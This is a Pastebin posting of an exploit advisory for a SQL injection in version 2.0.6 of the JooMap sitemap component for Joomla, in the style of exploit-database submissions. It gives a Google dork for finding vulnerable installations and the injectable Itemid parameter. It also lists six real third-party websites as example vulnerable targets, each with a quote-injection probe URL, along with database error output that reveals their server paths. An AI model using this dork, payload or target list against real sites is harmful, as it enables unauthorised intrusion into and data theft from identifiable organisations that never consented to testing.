Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JooMap Components 2.0.6 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : joomlacode.org
- # Software Download Link : joomlacode.org/gf/download/frsrelease/3734/8340/joomap2.06pre.zip
- # Software Information Link : joomlacode.org/gf/project/joomap/
- # Software Version : 2.0.6 and previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_joomap''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010303
- packetstormsecurity.com/files/151430/Joomla-JooMap-2.0.6-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- Joomap is a customizable sitemap component for Joomla.
- It shows all sections of a website in a hierarchical sitemap tree.
- It has support for Google Sitemaps XML generation and comes
- with a plugin-system to support adding categories from other components.
- ####################################################################
- # Impact :
- ***********
- Joomla JooMap 2.0.6 component for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_joomap&Itemid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] duratec.de/info/index.php?option=com_joomap&Itemid=22%27
- [+] atemregler.at/inhalt/index.php?option=com_joomap&Itemid=93%27
- [+] ask-datavernietiging.nl/index.php?option=com_joomap&Itemid=55%27
- [+] meta-mind.com/index.php?option=com_joomap&Itemid=34%27
- [+] cotid.net/index.php?option=com_joomap&Itemid=36%27
- [+] mycareer.ge/index.php?option=com_joomap&Itemid=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Function ereg() is deprecated in /home/.sites/507/site1115
- /web/inhalt/administrator/components/com_joomap/plugins/content.plugin.php on line 247
- Deprecated: Assigning the return value of new by reference is deprecated
- in /homepages/30/d13404336/htdocs/info/includes/joomla.php on line 836
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment